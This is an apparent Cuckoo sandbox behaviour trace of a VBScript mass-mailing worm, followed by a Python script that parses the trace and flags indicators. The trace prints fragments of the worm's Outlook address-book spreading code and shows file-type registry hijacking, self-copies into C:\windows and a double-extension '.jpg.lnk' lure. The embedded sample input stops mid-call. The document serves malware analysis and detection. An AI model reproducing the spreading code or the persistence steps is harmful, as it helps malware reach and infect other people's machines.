| 19:40:26,423 | 252 | NtReadFile |
Buffer => spreader =CreateObject("Outlook.Application")
Set spreader =spreader.GetNameSpace("MAPI")
For Each C In spreader.AddressLists
FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer =>
If C.AddressEntries.Count <> 0 Then
For D=1 To C.AddressEntries.Count
Set spreader=C.AddressEntries(D)
Set spreader=spreader FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => .CreateItem(0)
spreader.To=aaaaaaaa.Address
spreader.Subject="Vabian Milenium"
spreader.Body="Stop asking,just checkout the a FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => ttachment"
spreader.Attachments.Add(Fso.GetSpecialFolder(0)&"\Vabian.vbs")
spreader.DeleteAfterSubmit=True
'//If spreader.To FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => <> "" Then
'//spreader.Send
'//End If
Next
End If
Next
'VabianMarker FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => FileHandle => 0x000001b8 |
FAILURE | 0xc0000011 | |
| 19:40:26,423 | 252 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x0000e000 BaseAddress => 0x01631000 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegOpenKeyExA |
Handle => 0x000001ba Registry => 0x80000000 SubKey => TypeLib |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegOpenKeyExW |
Handle => 0x000001c6 Registry => 0x000001ba SubKey => {F935DC20-1CF0-11D0-ADB9-00C04FD58A0B} |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegOpenKeyExA |
Handle => 0x000001ca Registry => 0x000001c6 SubKey => 1.0 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x000001ca SubKey => 409 |
FAILURE | 0x00000002 | |
| 19:40:26,423 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x000001ca SubKey => 9 |
FAILURE | 0x00000002 | |
| 19:40:26,423 | 252 | RegOpenKeyExA |
Handle => 0x000001ce Registry => 0x000001ca SubKey => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegOpenKeyExW |
Handle => 0x000001da Registry => 0x000001ce SubKey => win32 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001da |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001ce |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegOpenKeyExW |
Handle => 0x000001ce Registry => 0x000001ca SubKey => 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegOpenKeyExW |
Handle => 0x000001da Registry => 0x000001ce SubKey => win32 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegQueryValueExW |
Handle => 0x000001da Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00o\x00m\x00.\x00o\x00c\x00x\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtCreateFile |
ShareAccess => 1 FileName => C:\WINDOWS\system32\wshom.ocx DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d8 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => PE\x00\x00 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => L\x01\x04\x000\xa1\x02H\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x02! FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d8 FileInformation => \x08\x01\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => .text\x00\x00\x00\xc22\x01\x00\x00\x10\x00\x00\x00@\x01\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00` FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => .data\x00\x00\x00\xc0
\x00\x00\x00P\x01\x00\x00\x10\x00\x00\x00P\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\xc0 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => .rsrc\x00\x00\x00`\x81\x00\x00\x00`\x01\x00\x00\x90\x00\x00\x00`\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00@ FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d8 FileInformation => `\x02\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x02\x00 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => `\x05\x00\x800\x00\x00\x80 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d8 FileInformation => \x18`\x01\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => \x03\x00 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => P\x05\x00\x80H\x00\x00\x80 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d8 FileInformation => `\x01\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => \x07\x00 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => T\x00Y\x00P\x00E\x00L\x00I\x00B\x00 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,423 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d8 FileInformation => `\x02\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d8 FileInformation => X`\x01\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => \x01\x00\x00\x00X\x01\x00\x80 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d8 FileInformation => `\x02\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => \x04\x00\x00\xc0\x03\x00\x00 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtSetInformationFile |
FileHandle => 0x000001d8 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,423 | 252 | NtReadFile |
Buffer => \x10i\x01\x00Ti\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtQueryInformationFile |
FileHandle => 0x000001d8 FileInformation => \x00\x10\x02\x00\x00\x00\x00\x00\x00\x10\x02\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | NtCreateSection |
ObjectAttributes => DesiredAccess => 0x000f0005 SectionHandle => 0x000001dc FileHandle => 0x000001d8 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e42c SectionHandle => 0x000001dc ProcessHandle => 0xffffffff BaseAddress => 0x00f80000 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001ce |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001ca |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001ba |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCreateKeyExA |
Handle => 0x000001ca Access => 2 Registry => 0x80000000 Class => SubKey => VXFile\DefaultIcon |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegSetValueExA |
Handle => 0x000001ca Buffer => C:\PROGRA~1\INTERN~1\iexplore.exe,8\x00 ValueName => Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001ca |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCreateKeyExA |
Handle => 0x000001ba Access => 2 Registry => 0x80000000 Class => SubKey => VXFile\ScriptEngine |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegSetValueExA |
Handle => 0x000001ba Buffer => VBScript\x00 ValueName => Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001ba |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCreateKeyExA |
Handle => 0x000001ca Access => 2 Registry => 0x80000000 Class => SubKey => VXFile\ScriptHostEncode |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegSetValueExA |
Handle => 0x000001ca Buffer => {85131631-480C-11D2-B1F9-00C04F86C324}\x00 ValueName => Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001ca |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCreateKeyExA |
Handle => 0x000001c6 Access => 2 Registry => 0x80000000 Class => SubKey => VXFile\Shell\Open\Command |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegSetValueExA |
Handle => 0x000001c6 Buffer => C:\WINDOWS\WScript.exe "%1" %*\x00 ValueName => Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCreateKeyExA |
Handle => 0x000001ba Access => 2 Registry => 0x80000000 Class => SubKey => VXFile\Shell\Play\Command |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegSetValueExA |
Handle => 0x000001ba Buffer => C:\WINDOWS\COMMAND\CScript.exe "%1" %*\x00 ValueName => Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001ba |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCreateKeyExA |
Handle => 0x000001ca Access => 2 Registry => 0x80000000 Class => SubKey => VXFile\ShellEx\PropertySheetHandlers\WSHProps |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegSetValueExA |
Handle => 0x000001ca Buffer => {60254CA5-953B-11CF-8C96-00AA00B8708C}\x00 ValueName => Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001ca |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCreateKeyExA |
Handle => 0x000001ba Access => 2 Registry => 0x80000000 Class => SubKey => .VX |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegSetValueExA |
Handle => 0x000001ba Buffer => VXFile\x00 ValueName => Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001ba |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCreateKeyExA |
Handle => 0x000001c6 Access => 2 Registry => 0x80000000 Class => SubKey => VX\CLSID |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegSetValueExA |
Handle => 0x000001c6 Buffer => {B54F3741-5B07-11cf-A4B0-00AA004A55E8}\x00 ValueName => Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | FindFirstFileExW |
FileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\dboardman3_malware2.vbs |
SUCCESS | 0x001ace08 | |
| 19:40:26,433 | 252 | CopyFileW |
ExistingFileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\dboardman3_malware2.vbs NewFileName => C:\windows\backup_vabian.sys |
SUCCESS | 0x00000001 | |
| 19:40:26,433 | 252 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c4 FileInformation => |
FAILURE | 0x80000006 | |
| 19:40:26,433 | 252 | FindFirstFileExW |
FileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\dboardman3_malware2.vbs |
SUCCESS | 0x001ace08 | |
| 19:40:26,433 | 252 | CopyFileW |
ExistingFileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\dboardman3_malware2.vbs NewFileName => C:\windows\Vabian.VX |
SUCCESS | 0x00000001 | |
| 19:40:26,433 | 252 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c4 FileInformation => |
FAILURE | 0x80000006 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001c4 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001c4 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001c4 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001c6 Registry => 0x80000000 SubKey => wscript.shell |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001ba Registry => 0x000001c6 SubKey => CLSID |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001ba Data => {\x007\x002\x00C\x002\x004\x00D\x00D\x005\x00-\x00D\x007\x000\x00A\x00-\x004\x003\x008\x00B\x00-\x008\x00A\x004\x002\x00-\x009\x008\x004\x002\x004\x00B\x008\x008\x00A\x00F\x00B\x008\x00}\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrGetProcedureAddress |
Ordinal => 1 FunctionName => FunctionAddress => 0x01001905 ModuleHandle => 0x01000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001c4 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001c4 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001c4 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001c4 Registry => 0x80000002 SubKey => Software\Microsoft\COM3 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001c4 Data => ValueName => REGDBVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001c4 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001c6 Registry => 0x000000f2 SubKey => CLSID\{00021401-0000-0000-C000-000000000046} |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001c6 SubKey => TreatAs |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001ba Registry => 0x000000f2 SubKey => |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001c6 Registry => 0x000001ba SubKey => CLSID\{00021401-0000-0000-C000-000000000046} |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001ca Registry => 0x000001c6 SubKey => InprocServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001ca DataLength => 1000 ValueName => InprocServer32 Type => 1581080 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001ca |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001c6 SubKey => InprocServerX86 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001c6 SubKey => LocalServer32 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001ca Registry => 0x000001c6 SubKey => InprocServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001ca Data => s\x00h\x00e\x00l\x00l\x003\x002\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001ca |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001c6 SubKey => InprocHandler32 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001c6 SubKey => InprocHandlerX86 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001c6 SubKey => LocalServer32 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001c6 SubKey => LocalServer |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001ca Registry => 0x000001ba SubKey => CLSID\{00021401-0000-0000-C000-000000000046} |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001ca DataLength => 100 ValueName => AppID Type => 1304768 |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001ca |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001c6 Registry => 0x000001ba SubKey => CLSID\{00021401-0000-0000-C000-000000000046} |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001ca Registry => 0x000001c6 SubKey => InprocServer32 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegQueryValueExW |
Handle => 0x000001ca Data => A\x00p\x00a\x00r\x00t\x00m\x00e\x00n\x00t\x00\x00\x00 ValueName => ThreadingModel |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001ca |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x000001c6 Registry => 0x80000000 SubKey => CLSID\{00021401-0000-0000-C000-000000000046} |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001c6 SubKey => TreatAs |
FAILURE | 0x00000002 | |
| 19:40:26,433 | 252 | RegCloseKey |
Handle => 0x000001c6 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrLoadDll |
Flags => 1301544 BaseAddress => 0x7c9c0000 FileName => shell32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DllGetClassObject FunctionAddress => 0x7c9f28b9 ModuleHandle => 0x7c9c0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DllCanUnloadNow FunctionAddress => 0x7ca2388d ModuleHandle => 0x7c9c0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | LdrGetProcedureAddress |
Ordinal => 236 FunctionName => FunctionAddress => 0x773e1798 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | NtCreateFile |
ShareAccess => 5 FileName => C:\Documents and Settings\All Users\Desktop\Sex-Vabian.jpg.lnk DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000000 |
FAILURE | 0xc0000034 | |
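The registry and file-system calls above are the part of this trace a reviewer turns into detection logic: a ProgID `VXFile` whose Shell verbs run WScript.exe and CScript.exe, a `.VX` extension mapped to it, two copies of the sample into C:\windows, and an attempt to open `Sex-Vabian.jpg.lnk` on the All Users desktop. The Python below is an added example, not code from the Cuckoo report or from the sample; it parses this flattened three-lines-per-call layout, resolves registry handles back to full key paths through the preceding RegCreateKeyEx/RegOpenKeyEx calls, and applies those four rules. The embedded trace is an excerpt copied from the lines above; the rule heuristics (the `C:\windows\` prefix, the double-extension check, the hive-constant map) are the example's own assumptions.

```python
"""Rebuild API calls from a flattened Cuckoo 1.x behaviour trace and flag the script-worm
behaviours seen in this run. Each call spans '| time | pid | api |', 'Key => value ... |' and
'SUCCESS|FAILURE | 0x... | [repeat] |' lines; long buffers wrap onto extra argument lines."""
import re
from collections import namedtuple

HIVES = {"0x80000000": "HKCR", "0x80000001": "HKCU", "0x80000002": "HKLM"}  # predefined HKEYs
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
CALL_HDR = re.compile(r"^\|\s*(\d\d:\d\d:\d\d,\d{3})\s*\|\s*(\d+)\s*\|\s*(\w+)\s*\|$")
STATUS = re.compile(r"^(SUCCESS|FAILURE)\s*\|\s*(0x[0-9a-fA-F]+)\s*\|(.*)\|$")
ARG_KEY = re.compile(r"\b(\w+) => ")
Call = namedtuple("Call", "ts pid api args status retval")


def _parse_args(raw):
    """Split 'Key => value Key => value |' into a dict; a value may be empty."""
    raw = raw.strip().rstrip("|").rstrip()
    keys = list(ARG_KEY.finditer(raw))
    args = {}
    for i, m in enumerate(keys):
        end = keys[i + 1].start() if i + 1 < len(keys) else len(raw)
        # Cuckoo prints the string terminator literally; drop trailing "\x00".
        args[m.group(1)] = re.sub(r"(\\x00)+$", "", raw[m.end():end].strip())
    return args


def parse_trace(text):
    """Reassemble Call records from the flattened layout."""
    calls, hdr, arg_lines = [], None, []
    for line in map(str.strip, text.splitlines()):
        m = CALL_HDR.match(line)
        if m:
            hdr, arg_lines = m.groups(), []
            continue
        s = STATUS.match(line)
        if s and hdr:
            calls.append(Call(hdr[0], int(hdr[1]), hdr[2],
                              _parse_args(" ".join(arg_lines)), s.group(1), s.group(2)))
            hdr = None
        elif hdr:
            arg_lines.append(line)
    return calls


def registry_writes(calls):
    """Resolve RegSetValueEx handles to full key paths via the preceding RegCreateKeyEx /
    RegOpenKeyEx calls; handles are recycled after RegCloseKey, so walk in call order."""
    paths, writes = {}, []
    for c in calls:
        if c.status == "SUCCESS" and c.api.startswith(("RegCreateKeyEx", "RegOpenKeyEx")):
            root = c.args.get("Registry", "")
            base = HIVES.get(root) or paths.get(root, root)   # hive constant or parent handle
            sub = c.args.get("SubKey", "").strip("\\")
            paths[c.args["Handle"]] = base + ("\\" + sub if sub else "")
        elif c.status == "SUCCESS" and c.api.startswith("RegSetValueEx"):
            writes.append((paths.get(c.args["Handle"], c.args["Handle"]),
                           c.args.get("ValueName") or "(Default)", c.args.get("Buffer", "")))
    return writes


def find_indicators(calls, sample_name):
    """Rules for the behaviours in this trace; the path heuristics are this example's own."""
    findings = []
    for key, _name, data in registry_writes(calls):
        parts, low = key.split("\\"), key.lower()
        if len(parts) == 2 and parts[1].startswith("."):          # HKCR\.ext -> ProgID
            findings.append(f"registers extension {parts[1]} -> ProgID {data}")
        if "\\shell\\" in low and low.endswith("\\command") and any(h in data.lower() for h in SCRIPT_HOSTS):
            findings.append(f"shell verb {key} runs a script host: {data}")
    for c in calls:
        if c.api == "CopyFileW" and c.status == "SUCCESS":
            src, dst = c.args.get("ExistingFileName", ""), c.args.get("NewFileName", "")
            if src.lower().endswith(sample_name.lower()) and dst.lower().startswith("c:\\windows\\"):
                findings.append(f"self-copy to {dst}")
        elif c.api == "NtCreateFile":
            name = c.args.get("FileName", "").rsplit("\\", 1)[-1]
            if name.lower().endswith(".lnk") and name.count(".") >= 2:  # e.g. picture.jpg.lnk
                findings.append(f"double-extension lure {name} ({c.status} {c.retval})")
    return findings


# Constructed input: six calls copied verbatim from the trace above.
SAMPLE_TRACE = r"""
| 19:40:26,423 | 252 | RegCreateKeyExA |
Handle => 0x000001c6 Access => 2 Registry => 0x80000000 Class => SubKey => VXFile\Shell\Open\Command |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegSetValueExA |
Handle => 0x000001c6 Buffer => C:\WINDOWS\WScript.exe "%1" %*\x00 ValueName => Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegCreateKeyExA |
Handle => 0x000001ba Access => 2 Registry => 0x80000000 Class => SubKey => .VX |
SUCCESS | 0x00000000 | |
| 19:40:26,423 | 252 | RegSetValueExA |
Handle => 0x000001ba Buffer => VXFile\x00 ValueName => Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,433 | 252 | CopyFileW |
ExistingFileName => C:\DOCUME~1\cuckoo\LOCALS~1\Temp\dboardman3_malware2.vbs NewFileName => C:\windows\backup_vabian.sys |
SUCCESS | 0x00000001 | |
| 19:40:26,433 | 252 | NtCreateFile |
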